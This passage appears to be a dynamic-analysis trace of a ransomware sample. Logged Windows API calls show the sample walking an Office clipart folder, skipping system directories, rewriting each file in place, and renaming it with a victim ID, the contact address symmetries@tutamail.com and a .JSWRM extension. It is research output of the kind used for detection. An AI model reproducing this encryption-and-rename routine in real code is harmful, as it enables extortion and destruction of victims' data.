cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00320_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00320_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00320_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00320_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00320_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0076.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0076.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.848] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=736) returned 1 [0076.848] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0076.848] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0076.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.849] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0076.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0076.849] CloseHandle (hObject=0x314) returned 1 [0076.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0076.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0076.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0076.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0076.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.850] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0076.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0076.850] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x439c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00397_.WMF", cAlternateFileName="")) returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2=".") returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="..") returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="...") returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="windows") returned -1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="recovery") returned -1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="perflogs") returned -1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="documents and settings") returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="system volume information") returned -1 [0076.851] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="msocache") returned -1 [0076.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00397_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00397_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00397_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00397_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00397_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00397_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0076.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0076.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0076.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.851] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17308) returned 1 [0076.852] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4390) returned 0x24d210 [0076.852] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4390, lpOverlapped=0x0) returned 1 [0076.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.854] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4390, lpOverlapped=0x0) returned 1 [0076.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.854] CloseHandle (hObject=0x314) returned 1 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0076.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0076.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0076.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0076.855] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0076.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0076.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0076.856] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00902_.WMF", cAlternateFileName="")) returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2=".") returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="..") returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="...") returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="windows") returned -1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="recovery") returned -1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="perflogs") returned -1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="documents and settings") returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="system volume information") returned -1 [0076.856] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="msocache") returned -1 [0076.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00902_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00902_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00902_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0076.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00902_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00902_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00902_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0076.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0076.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.858] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7944) returned 1 [0076.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f00) returned 0x205850 [0076.858] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f00, lpOverlapped=0x0) returned 1 [0076.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.860] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f00, lpOverlapped=0x0) returned 1 [0076.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.860] CloseHandle (hObject=0x314) returned 1 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0076.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0076.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0076.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0076.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0076.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0076.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0076.861] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2942, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EXPLR_01.MID", cAlternateFileName="")) returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2=".") returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="..") returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="...") returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="windows") returned -1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="recovery") returned -1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="perflogs") returned -1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="documents and settings") returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="system volume information") returned -1 [0076.861] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="msocache") returned -1 [0076.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLR_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLR_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPLR_01.MID", lpUsedDefaultChar=0x0) returned 12 [0076.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLR_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLR_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPLR_01.MID", lpUsedDefaultChar=0x0) returned 12 [0076.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0076.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 